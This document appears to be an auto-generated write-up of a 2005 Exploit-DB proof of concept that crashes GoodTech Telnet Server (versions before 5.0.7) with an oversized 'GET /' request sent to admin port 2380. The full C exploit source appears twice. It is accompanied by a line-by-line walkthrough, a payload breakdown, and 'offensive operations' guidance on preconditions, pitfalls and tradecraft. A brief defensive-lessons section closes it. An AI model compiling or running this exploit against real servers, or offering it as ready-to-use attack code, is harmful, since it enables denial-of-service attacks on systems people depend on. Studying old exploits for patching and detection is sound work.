GoodTech Telnet Server Crash POC: A Deep Dive for Offensive Teams

What this paper is

This paper, published by Komrade in 2005, presents a Proof-of-Concept (POC) exploit for GoodTech Telnet Server versions prior to 5.0.7. The exploit targets a buffer overflow vulnerability in the server's administration interface, leading to a denial-of-service (DoS) condition where the server crashes. It specifically targets the administration port, which is stated to be the default port 2380.

Simple technical breakdown

The exploit works by sending an overly long string to the GoodTech Telnet Server's administration interface. This long string overwrites a buffer allocated for receiving requests. When the server attempts to process this oversized data, it tries to access memory that it shouldn't, specifically at the address 0xDEADCODE, causing it to crash. This is a classic buffer overflow leading to a denial of service.

Complete code and payload walkthrough

Let's break down the provided C code and its payload.

/******************************************************************************************

	GoodTech Telnet Server Buffer Overflow Crash POC
	created by Komrade
	e-mail:	unsecure(at)altervista(dot)org
	web:	http://unsecure.altervista.org

	Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
        on a Windows XP Professional sp2 operating system.

	This exploit connects to the Administration server of GoodTech Telnet Server
	(default port 2380) and sends a very long string (10040 bytes).
	After the exploit is sent the Telnet Server will crash, trying to access
	to a bad memory address: 0xDEADCODE.

	Usage: gtscrash.exe "IP address"

	Options:
	"IP address"	The IP address of the computer running GoodTech Telnet Server

*******************************************************************************************/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

int main(int argc, char **argv)
{

	SOCKET sock;
	struct sockaddr_in sock_addr;
	WSADATA data;
	WORD p;
	p=MAKEWORD(2,0);
	WSAStartup(p,&data);
	int i, n, err;
	unsigned char *mex;
	char risp[4096];

	printf("------------------------------------------------------------------------------\r\n");
	printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
	printf("\t\t\tcreated by Komrade\r\n\r\n");

	printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
	printf("\t\tweb: http://unsecure.altervista.org\r\n");
	printf("------------------------------------------------------------------------------\r\n\r\n");


	if (argc < 2){
		printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
		printf("Options:\r\n");
		printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
		exit(0);
	}

	mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	sock_addr.sin_family=PF_INET;
	sock_addr.sin_port=htons(2380); /* Administration web server port */
	sock_addr.sin_addr.s_addr= inet_addr(argv[1]);

	err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
	if(err<0){
		printf("Unable to connect() to %s\n", argv[1]);
		exit(-1);
	}

	strcpy (mex, "GET /");

	for(i = strlen(mex); i < 10032; i++)
		mex[i]= 'a';
	mex[i]=0;

	strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
	strcat(mex, "\r\n\r\n");

	printf("Sending %d bytes.....\n\n", strlen(mex));
	n=send(sock, mex , strlen(mex), 0);

	n=recv(sock, risp, sizeof(risp), 0);
	if (n < 0)
		printf("GoodTech Telnet Server succesfully crashed!!\n");
	else{
		risp[n]=0;
		printf("%s\n", risp);
	}

	closesocket(sock);
	WSACleanup();
	return 0;
}

// milw0rm.com [2005-03-15]

Code Fragment/Block	Practical Purpose
`#include <windows.h>`, `#include <winsock.h>`, `#include <stdio.h>`	These are standard C header files. `windows.h` provides Windows API functions, `winsock.h` is for network programming (sockets), and `stdio.h` is for standard input/output functions like `printf`.
`int main(int argc, char **argv)`	The entry point of the C program. `argc` is the argument count, and `argv` is an array of strings representing the command-line arguments.
`SOCKET sock; struct sockaddr_in sock_addr; WSADATA data; WORD p;`	Declarations for network-related variables: `sock` for the socket descriptor, `sock_addr` for storing server address information, `data` for Windows Sockets API initialization, and `p` for the version of Winsock to use.
`p=MAKEWORD(2,0); WSAStartup(p,&data);`	Initializes the Winsock library. `MAKEWORD(2,0)` specifies Winsock version 2.0. `WSAStartup` is required before any other Winsock functions can be used.
`int i, n, err; unsigned char *mex; char risp[4096];`	`i` and `n` are loop counters/sizes. `err` stores error codes. `mex` is a pointer to an unsigned character array that will hold the exploit payload. `risp` is a buffer to store any response from the server.
`printf(...)` blocks	These lines print informational messages to the console, including the exploit's title, author, and usage instructions.
`if (argc < 2)`	Checks if the user provided at least one command-line argument (the IP address). If not, it prints usage instructions and exits.
`mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);`	Allocates a memory buffer of 12000 bytes using `LocalAlloc`. This buffer will store the exploit payload. `LMEM_FIXED` means the allocated memory is not movable.
`sock = socket(AF_INET, SOCK_STREAM, 0);`	Creates a socket. `AF_INET` specifies the IPv4 address family, `SOCK_STREAM` indicates a TCP socket (connection-oriented), and `0` means the default protocol (TCP).
`sock_addr.sin_family=PF_INET; sock_addr.sin_port=htons(2380); sock_addr.sin_addr.s_addr= inet_addr(argv[1]);`	Configures the server address structure: `sin_family` to IPv4, `sin_port` to 2380 (converted to network byte order using `htons`), and `sin_addr.s_addr` to the IP address provided as a command-line argument (converted from string to IP address format using `inet_addr`).
`err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));`	Attempts to establish a TCP connection to the target server at the specified IP address and port.
`if(err<0)`	Checks if the `connect` call failed. If it did, an error message is printed, and the program exits.
`strcpy (mex, "GET /");`	Initializes the `mex` buffer with the string "GET /". This is a common HTTP-like request prefix.
`for(i = strlen(mex); i < 10032; i++) mex[i]= 'a'; mex[i]=0;`	This loop fills the `mex` buffer with 'a' characters starting from the end of "GET /" up to index 10031. This creates a long string of 'a's. `mex[i]=0;` null-terminates the string at index 10032, making its total length 10032 characters.
`strcat(mex, "\xDE\xC0\xAD\xDE");`	Appends the hexadecimal byte sequence `0xDE`, `0xC0`, `0xAD`, `0xDE` to the `mex` buffer. This sequence represents the target crash address `0xDEADCODE` in little-endian format.
`strcat(mex, "\r\n\r\n");`	Appends two carriage return and newline characters. This typically signifies the end of an HTTP-like request header.
`printf("Sending %d bytes.....\n\n", strlen(mex));`	Prints the total length of the payload being sent.
`n=send(sock, mex , strlen(mex), 0);`	Sends the constructed payload (`mex`) over the established socket connection to the server.
`n=recv(sock, risp, sizeof(risp), 0);`	Attempts to receive data from the server into the `risp` buffer.
`if (n < 0)`	If `recv` returns a negative value, it usually indicates an error or that the connection was closed unexpectedly. In this context, the author interprets this as a successful crash, as the server likely terminated the connection.
`else { risp[n]=0; printf("%s\n", risp); }`	If data was received, it's null-terminated and printed. This might be an error message from the server or unexpected behavior if the server didn't crash.
`closesocket(sock); WSACleanup();`	Closes the socket connection and cleans up the Winsock library resources.
`return 0;`	Indicates successful program execution.

Payload Segments:

"GET /": A prefix that mimics an HTTP GET request. This is likely how the GoodTech Telnet Server administration interface expects requests.
'a' characters (10032 - 5 = 10027 'a's): This is the overflow data. It's a long string of 'a's designed to fill the vulnerable buffer and spill over into adjacent memory. The exact length (10032 total bytes including "GET /" and the crash address) is crucial for triggering the overflow.
"\xDE\xC0\xAD\xDE": This is the critical part that causes the crash. In little-endian byte order, this sequence represents the memory address 0xDEADCODE. When the server attempts to use this invalid address (likely as a return address or instruction pointer), it triggers a segmentation fault or access violation, leading to a crash.
"\r\n\r\n": Standard HTTP header termination.

Practical details for offensive operations teams

Required Access Level: Network access to the target machine's IP address and the ability to establish a TCP connection to port 2380. No local access or elevated privileges are required on the target.
Lab Preconditions:
- A vulnerable GoodTech Telnet Server (versions 4.0 to 5.0, excluding 5.0.7) must be running on a target machine.
- The server must be accessible over the network on port 2380.
- A Windows XP SP2 machine (as per the paper's testing environment) is ideal for replicating the original findings, though the exploit might work on other Windows versions with similar server behavior.
- A C compiler (like MinGW or Visual Studio) to compile the gtscrash.exe exploit.
Tooling Assumptions:
- The exploit is provided as C source code, requiring compilation into an executable (gtscrash.exe).
- Standard Windows networking libraries (winsock) are available.
Execution Pitfalls:
- Incorrect Port: The exploit specifically targets port 2380. If the server is configured to use a different administration port, the exploit will fail to connect.
- Firewall Blocking: Network firewalls between the attacker and the target may block traffic to port 2380.
- Patched Server: Versions 5.0.7 and later are not vulnerable. The exploit will likely fail if run against a patched version.
- Server Configuration: If the administration interface is disabled or not running, the exploit will fail.
- Payload Size/Offset: While the paper specifies a 10040-byte string (which translates to 10032 bytes in the code before the crash address), slight variations in buffer sizes or server handling could require adjustments to the payload length to achieve a reliable crash. The current code sends 10032 bytes of 'a's followed by the crash address.
- Network Instability: Unreliable network connections can cause the send or recv operations to fail, potentially leading to false positives or missed crashes.
Tradecraft Considerations:
- Reconnaissance: Confirm the presence and version of GoodTech Telnet Server. Identify the administration port (default 2380).
- Stealth: This exploit is noisy. It involves a direct connection and a crash, which will likely generate immediate alerts on the target system or network. It's best used in scenarios where stealth is not a primary concern or during authorized testing phases where such activity is expected.
- Impact Assessment: This exploit causes a denial of service. Ensure this is an acceptable outcome for the authorized operation. It does not provide remote code execution or data exfiltration capabilities.
- Post-Exploitation: Since this is a DoS, there's no direct post-exploitation. The goal is to disrupt the service.

Where this was used and when

Context: This exploit was designed to demonstrate a vulnerability in GoodTech Telnet Server, specifically its administration interface. It was likely used by security researchers to highlight security flaws in widely deployed software at the time.
When: Published on March 15, 2005. The vulnerability existed in versions 4.0 through 5.0 (prior to 5.0.7). Therefore, its active exploitation period would have been before 2005, and potentially shortly after for systems that hadn't patched.

Defensive lessons for modern teams

Vulnerability Management: Regularly scan for and patch known vulnerabilities in network services like Telnet servers.
Service Hardening: Disable or restrict access to administrative interfaces of network services unless absolutely necessary. Use strong authentication mechanisms.
Network Segmentation: Isolate critical services and administrative interfaces from less trusted network segments.
Intrusion Detection/Prevention Systems (IDS/IPS): Deploy IDS/IPS solutions that can detect anomalous traffic patterns, such as unusually long requests or malformed data sent to network services. Signatures for known exploits can also be effective.
Logging and Monitoring: Ensure comprehensive logging for network service access and errors. Monitor logs for signs of connection attempts to unusual ports or repeated connection failures, which could indicate scanning or exploitation attempts.
Buffer Overflow Protection: Modern operating systems and compilers often include protections like Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). While this exploit predates widespread ASLR adoption, understanding buffer overflow mechanics is key to recognizing and mitigating similar vulnerabilities.

ASCII visual (if applicable)

This exploit is a simple client-server interaction. An ASCII visual can illustrate the connection and data flow.

+-----------------+       +-------------------------+
| Attacker Client | ----> | GoodTech Telnet Server  |
| (gtscrash.exe)  |       | (Port 2380 Admin)       |
+-----------------+       +-------------------------+
        |
        | 1. Connect to 2380
        |
        | 2. Send "GET /" + 10027 'a's + 0xDEADCODE + \r\n\r\n
        |-------------------------------------------->
        |
        | 3. Server attempts to process invalid address 0xDEADCODE
        |    -> CRASH (Denial of Service)
        |
        | 4. Connection likely terminated by server OS
        |<-------------------------------------------- (Implicit)

Source references

Paper URL: https://www.exploit-db.com/papers/882
Raw Exploit URL: https://www.exploit-db.com/raw/882
Author: Komrade
Published: 2005-03-15

Original Exploit-DB Content (Verbatim)

/******************************************************************************************

	GoodTech Telnet Server Buffer Overflow Crash POC
	created by Komrade
	e-mail:	unsecure(at)altervista(dot)org
	web:	http://unsecure.altervista.org

	Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
        on a Windows XP Professional sp2 operating system.

	This exploit connects to the Administration server of GoodTech Telnet Server
	(default port 2380) and sends a very long string (10040 bytes).
	After the exploit is sent the Telnet Server will crash, trying to access
	to a bad memory address: 0xDEADCODE.

	Usage: gtscrash.exe "IP address"

	Options:
	"IP address"	The IP address of the computer running GoodTech Telnet Server

*******************************************************************************************/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>

int main(int argc, char **argv)
{

	SOCKET sock;
	struct sockaddr_in sock_addr;
	WSADATA data;
	WORD p;
	p=MAKEWORD(2,0);
	WSAStartup(p,&data);
	int i, n, err;
	unsigned char *mex;
	char risp[4096];

	printf("------------------------------------------------------------------------------\r\n");
	printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
	printf("\t\t\tcreated by Komrade\r\n\r\n");

	printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
	printf("\t\tweb: http://unsecure.altervista.org\r\n");
	printf("------------------------------------------------------------------------------\r\n\r\n");


	if (argc < 2){
		printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
		printf("Options:\r\n");
		printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
		exit(0);
	}

	mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	sock_addr.sin_family=PF_INET;
	sock_addr.sin_port=htons(2380); /* Administration web server port */
	sock_addr.sin_addr.s_addr= inet_addr(argv[1]);

	err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
	if(err<0){
		printf("Unable to connect() to %s\n", argv[1]);
		exit(-1);
	}

	strcpy (mex, "GET /");

	for(i = strlen(mex); i < 10032; i++)
		mex[i]= 'a';
	mex[i]=0;

	strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
	strcat(mex, "\r\n\r\n");

	printf("Sending %d bytes.....\n\n", strlen(mex));
	n=send(sock, mex , strlen(mex), 0);

	n=recv(sock, risp, sizeof(risp), 0);
	if (n < 0)
		printf("GoodTech Telnet Server succesfully crashed!!\n");
	else{
		risp[n]=0;
		printf("%s\n", risp);
	}

	closesocket(sock);
	WSACleanup();
	return 0;
}

// milw0rm.com [2005-03-15]

By exploitdb papers bot•March 15, 2005•

papers